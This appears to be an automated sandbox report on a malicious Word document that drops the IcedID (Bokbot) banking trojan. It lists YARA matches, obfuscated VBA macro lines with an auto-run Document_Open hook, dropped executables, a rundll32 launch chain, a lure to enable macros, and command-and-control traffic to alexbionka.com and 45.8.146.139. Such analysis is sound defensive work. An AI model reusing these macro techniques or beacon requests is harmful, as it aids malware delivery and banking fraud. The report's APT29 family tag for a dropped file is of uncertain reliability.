      Source: rundll32.exe, 00000005.00000002.946611241.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://alexbionka.com/
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4221A912-2B82-4834-A4D3-95CF1F77F776}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: alexbionka.com
      Source: global trafficHTTP traffic detected: GET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:5038:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:30423335313032443133344136373743; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com

      E-Banking Fraud

      barindex
      Yara detected IcedID
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects IceID / Bokbot variants Author: ditekSHen
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
      Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4Screenshot OCR: Enable editing" button on I W a the top bar, and then cIick"Enable content". . 0 e ="F- "" m
      Source: Screenshot number: 4Screenshot OCR: Enable content". . 0 e ="F- "" m " " "" " "" " 8==",== " ii; It ' 4#1,1 0 Pa,e, I of
      Submitted sample is a known malware sample
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group to collect intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdfhttps://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdfhttps://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
      Office process drops PE file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to dropped file
      Document contains an embedded VBA macro with suspicious strings
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
      Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800024FC5_2_00000001800024FC
      Source: dodsonimaging,file,08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
      Source: ~DF4786325F45128C5F.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess,4_2_00041203
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041A33 NtOpenProcessToken,NtClose,4_2_00041A33
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_00041A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,4_2_00041A8C
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000419E3 NtOpenProcessToken,NtSetInformationToken,NtClose,4_2_000419E3
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D5FE6 NtCreateSection,NtMapViewOfSection,5_2_000007FEF74D5FE6
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D5FF9 NtCreateSection,5_2_000007FEF74D5FF9
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_000000018000108C
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: ~DF4786325F45128C5F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drStatic PE information: No import functions for PE file found
      Source: y84FE.tmp.dll.0.drStatic PE information: No import functions for PE file found
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: r8F8A.tmp.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dodsonimaging,file,08.11.2022.docOLE indicator, VBA macros: true
      Source: ~DF4786325F45128C5F.TMP.0.drOLE indicator, VBA macros: true
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: dodsonimaging,file,08.11.2022.docVirustotal: Detection: 26%
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1Jump to behavior
      Source: dodsonimaging,file,08.11.2022.LNK.0.drLNK file: ..\..\..\..\..\Desktop\dodsonimaging,file,08.11.2022.doc
      Source: dodsonimaging,file,08.11.2022.docOLE indicator, Word Document stream: true
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.docJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6B5F.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/14@2/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000414BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW,4_2_000414BD
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCommand line argument: RunDLL4_2_00041203
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: title field not present or empty
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: author field not present or empty
      Source: dodsonimaging,file,08.11.2022.docOLE document summary: edited time not present or 0
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drOLE document summary: edited time not present or 0
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: title field not present or empty
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: author field not present or empty
      Source: ~DF4786325F45128C5F.TMP.0.drOLE document summary: edited time not present or 0
      Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: dodsonimaging,file,08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: dodsonimaging,file,08.11.2022.docStatic file information: File size 2298458 > 1048576
      Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr
      Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeCode function: 4_2_000419CA push ecx; ret 4_2_000419DD
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D8BC2 push rax; ret 5_2_000007FEF74D8BDE
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D610E push rdx; ret 5_2_000007FEF74D611B
